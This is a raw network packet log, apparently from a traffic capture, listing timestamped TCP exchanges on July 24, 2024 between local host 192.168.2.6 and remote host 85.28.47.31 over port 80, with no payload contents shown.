                                                                                        Jul 24, 2024 07:14:19.488909960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.488933086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.488943100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.488964081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.489038944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.489846945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.489881992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.489902973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.489913940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.489938974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.489948988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.489959002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.490000010 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.490788937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.490823030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.490843058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.490854979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.490866899 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.490904093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.491792917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.491827965 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.491846085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.491862059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.491874933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.491919994 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.492758989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.492793083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.492826939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.492835999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.492835999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.492868900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.493765116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.493835926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.494381905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.494416952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.494450092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.494477987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.495414972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.495450020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.495482922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.495529890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.495529890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.495529890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.496529102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.496565104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.496594906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.496803999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.497534990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.497570038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.497589111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.497649908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.498637915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.498672009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.498693943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.498723984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.499454021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.499489069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.499542952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.500232935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.500273943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.500313044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.500324965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.500324965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.500350952 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.501033068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.501065969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.501106024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.501106024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.501908064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.501940966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.501962900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.501986980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.502715111 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.502749920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.502769947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.502800941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.503520966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.503556013 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.503587961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.506998062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.555722952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.555844069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.555876970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.555903912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.555903912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.555996895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.556269884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.556303024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.556327105 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.556360006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.557073116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.557106972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.557168007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.557868004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.557903051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.557976007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.558630943 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.558665037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.558712959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.558742046 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.559453011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.559487104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.559506893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.559520006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.559570074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.560189962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.560224056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.560245037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.560272932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.560978889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.561012983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.561038971 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.561068058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.561760902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.561794043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.561826944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.561827898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.561849117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.561871052 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.562563896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.562597990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.562660933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.563385010 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.563419104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.563446999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.563564062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.564105034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.564138889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.564167976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.564194918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.564894915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.564929008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.564960957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.564964056 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.564995050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.565011978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.565676928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.565710068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.565800905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.566473961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.566509008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.566540956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.566570044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.566598892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.567235947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.567270041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.567332983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.568015099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.568049908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.568073034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.568094969 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.568813086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.568847895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.568866968 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.568943024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.569578886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.569612026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.569644928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.569650888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.569669008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.569706917 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.570384026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.570417881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.570446014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.570476055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.571140051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.571173906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.571203947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.571206093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.571227074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.571309090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.571940899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.571974993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.571997881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.572032928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.572726011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.572760105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.572799921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.572799921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.573510885 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.573544979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.573570967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.573600054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.574286938 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.574320078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.574373960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.574402094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.575090885 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.575124979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.575158119 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.575159073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.575179100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.575213909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.575834990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.575867891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.575922966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.576757908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.576793909 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.576827049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.576839924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.576839924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.576869965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.577223063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.577292919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.577522993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.577574968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.577593088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.577608109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.577657938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.578528881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.578563929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.578594923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.578597069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.578620911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.578668118 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.579463959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.579497099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.579529047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.579530954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.579554081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.579562902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.579612017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.579612017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.580425978 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.580460072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.580478907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.580513000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.580569983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.581612110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.581646919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.581672907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.581680059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.581692934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.581715107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.581739902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.581757069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.582904100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.582937956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.582969904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.582971096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.582993031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.583013058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.584095955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.584131002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.584161997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.584515095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.585326910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585361004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585410118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585442066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585474968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585508108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585593939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585887909 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585921049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.585952997 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.586519957 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.586704016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.586743116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.586775064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.586775064 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.586802006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.586810112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.586824894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.586853981 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.587481976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.587515116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.587534904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.587548018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.587563992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.587600946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.588310957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.588344097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.588375092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.588376999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.588392973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.588408947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.588421106 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.588457108 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.650942087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651032925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651068926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651104927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.651106119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.651106119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.651508093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651566029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651571989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.651601076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.651624918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.651643991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.652540922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.652578115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.652630091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.652662039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.652700901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.653234005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.653270006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.653297901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.653304100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.653316975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.653340101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.653394938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.654124975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.654161930 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.654187918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.654195070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.654227972 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.654268980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.654982090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655019045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655052900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655083895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.655113935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.655869007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655905008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655939102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655946016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.655967951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.655973911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.655986071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.656078100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.656759977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.656796932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.656824112 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.656830072 CEST804971185.28.47.31192.168.2.6
